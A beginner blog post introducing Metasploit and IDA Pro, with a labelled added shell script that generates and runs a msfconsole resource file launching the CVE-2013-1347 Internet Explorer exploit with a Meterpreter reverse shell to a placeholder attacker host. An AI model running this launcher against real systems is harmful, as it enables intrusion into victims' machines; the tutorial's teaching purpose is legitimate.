Sunday, September 17, 2017

Exploiting and Debugging for Beginners



In this post I will give a brief explanation of two of the most important tools used for developing exploits and analysing vulnerabilities. The first is Metasploit, a penetration-testing framework used to develop and run exploits, and the second is IDA Pro, a disassembler with an integrated debugger that security specialists use for reverse engineering and vulnerability analysis.

Metasploit

Metasploit makes it easier to develop and use exploits. It ships with a large, regularly updated database of exploit modules and payloads. The term exploit refers to a piece of code that targets one or more vulnerabilities on a particular system. We will define it as any software that uses a system in a way it isn't supposed to be used in order to perform actions without permission.

If you don't have Metasploit installed you can download it here for free. Keep in mind that antivirus software commonly flags Metasploit's exploit modules and payloads and will quarantine or block them, and a host firewall can block the listeners Metasploit opens. Rather than disabling both outright, use a dedicated lab machine and add an exclusion for the Metasploit installation directory, and only allow the ports your exploit or handler actually needs.

Once you start the Metasploit console (msfconsole) you can type help to see a list of all the commands you can use. To find an exploit connected to a certain vulnerability, use the search command. For example, if you want to find the module for the CVE-2013-1347 vulnerability in Internet Explorer 8 you can type search cve-2013-1347 (or, to filter on the CVE field specifically, search cve:2013-1347).


As can be seen in the picture above, the exploit that is needed is labeled ie_cgenericelement_uaf. To start using it, type use exploit/windows/browser/ie_cgenericelement_uaf into the console.


After deciding on the exploit you have to choose a payload that will be sent to the target. The payload is the piece of code delivered to the victim's machine along with the exploit; it is executed only if the exploit succeeds. The show payloads command lists all the payloads in Metasploit that are compatible with the exploit you selected. The choice of payload depends on the goal you want to accomplish with the attack and on the operating system and architecture you are attacking. Aside from the payloads in Metasploit's database, you also have the option of writing your own custom payloads.


When it comes to gaining shell access on the victim's computer, the most popular choice is the Meterpreter payload. If you're interested in other types of payloads you can find information about them here. To set a payload, type set payload [path_to_the_payload]. For example, if you only want this attack to pop up a message box on the target, type set payload windows/messagebox.

Before initiating the exploit you should always check that all the parameters are set correctly with the show options command; required options that are still empty are the usual reason an exploit fails to launch. To adjust a parameter, type set [parameter_name] [parameter_value]. Once you've checked all the parameters, initiate the exploit with the exploit or run command. Depending on the module, Metasploit will then either attack the targeted machine directly or, for a browser exploit like this one, start a web server and print a URL that the victim has to open.

A successful exploit will result in a new session being opened. To list all the open sessions type sessions (or sessions -l), and to interact with one type sessions -i [session_id].
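The sequence above (use the module, pick a payload, set and check the options, run it, list the sessions) can be captured in a msfconsole resource script so the setup is repeatable and typo-free. The following script is an added example, not part of the original post or of Metasploit itself. It writes such a resource file for the ie_cgenericelement_uaf module, checks that every line is a known console command, and runs it with msfconsole if that is installed. The attacker address 192.0.2.10 (from the documentation range), the ports, the URIPATH and the default Meterpreter payload are placeholders chosen for this example; adjust them to your own lab.

```shell
#!/bin/sh
# Added example (not from the original post): replay the msfconsole steps
# described above as a resource (.rc) script that msfconsole can run with -r.
# Assumptions: lab attacker host 192.0.2.10, SRVPORT 8080, URIPATH /update and
# LPORT 4444 are placeholders for this example.

# Write a resource script for the IE CGenericElement use-after-free module.
#   $1 = output path, $2 = attacker IP (used for SRVHOST and LHOST),
#   $3 = payload (defaults to Meterpreter reverse TCP)
make_rc() {
  out=$1
  lhost=$2
  payload=${3:-windows/meterpreter/reverse_tcp}
  cat > "$out" <<EOF
# generated resource script: browser exploit for CVE-2013-1347 (MS13-038)
use exploit/windows/browser/ie_cgenericelement_uaf
set payload $payload
set SRVHOST $lhost
set SRVPORT 8080
set URIPATH /update
set LHOST $lhost
set LPORT 4444
show options
exploit -j
sessions -l
EOF
}

# Sanity-check a resource script before handing it to msfconsole: every
# non-blank, non-comment line must start with a console command we expect,
# so a typo such as "sploit" is caught early. Returns 1 on the first bad line.
check_rc() {
  while IFS= read -r line; do
    case $line in
      ''|\#*) ;;                                   # blank line or comment
      use\ *|set\ *|setg\ *|show\ *) ;;
      exploit|exploit\ *|run|run\ *) ;;
      sessions|sessions\ *) ;;
      *) echo "unexpected line in $1: $line" >&2; return 1 ;;
    esac
  done < "$1"
}

# Run the script non-interactively: -q suppresses the banner, -r loads the
# resource file. "exploit -j" in the script starts the browser exploit as a
# background job, so the console stays usable and prints the URL to hand out.
run_rc() {
  command -v msfconsole >/dev/null 2>&1 || {
    echo "msfconsole not installed; generated $1 only" >&2
    return 2
  }
  msfconsole -q -r "$1"
}

# Usage: sh this_script.sh --demo
if [ "${1:-}" = "--demo" ]; then
  make_rc ie_uaf.rc 192.0.2.10 && check_rc ie_uaf.rc && run_rc ie_uaf.rc
fi
```

Swap the third argument of make_rc for windows/messagebox to reproduce the message-box variant from the text; that payload opens no session, so the final sessions -l will simply list nothing.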

IDA Pro

IDA Pro is primarily an interactive disassembler, but because it also integrates a debugger and offers a rich set of analysis features it is heavily used for reverse engineering by security specialists.

Once you start IDA Pro you have the option to start a new disassembly or to load a disassembly youve previously worked on.


If you choose the New option you have to load the file you will disassemble. To step through the program rather than only read its disassembly, you also pick a debugger backend, such as the Bochs plugin or the WinDbg debugger. Your choice depends on the file you're debugging (for example whether it runs locally or on a remote machine) and how you need to analyse it.


After you choose a program and a debugger, IDA will analyse the program and build its graph view. Depending on the selected debugger and the program you wish to analyse, you will sometimes have to attach the debugger to an already running process (Debugger -> Attach) instead of launching the program from IDA.

The following picture is an example of a disassembly in IDA.



On the right side of the picture, under the tab titled IDA View-A, you can see the program organised into connected basic blocks that form a graph. You can also see an overview of the complete graph of the current function in the lower left of the picture. By right-clicking in the IDA View-A tab and selecting Text view (or pressing the Space key) you can toggle to the classic linear view of the program's code.

You can also notice at the top of the picture a tab named Hex View-A, which shows the raw bytes of the program in hexadecimal. While the debugger is running it shows the process's memory, which is useful when you are developing an exploit and need to see how your input modifies memory during execution. Since a lot of exploits are based on memory corruption, this information is crucial.

IDA Pro offers a lot of additional useful options such as tracing and breakpoints. Tracing records the executed instructions and the values in the registers as the program runs, giving you insight into the program's execution and making analysis easier. To start a trace select Debugger -> Tracing -> Instruction tracing in the menu bar, and to see the recorded trace select Debugger -> Tracing -> Trace window. Breakpoints are used to pause the program's execution at a chosen point. To put a breakpoint on a certain instruction, right-click that line and select Add breakpoint.

You can also use the F2 key as a shortcut for inserting breakpoints.

Pentesting

Since both of these programs offer a wide array of options they are regularly used for pentesting. To use them effectively you need to be skilled in their application, and the only way to become skilled is a lot of practice. Furthermore, finding and recognising vulnerabilities also requires a lot of practice and general knowledge about programming and computer systems. A good way to learn is to study exploits that are already tested and analysed and then work your way up. Once you have enough experience you will be able to find vulnerabilities yourself and write your own exploits for them.
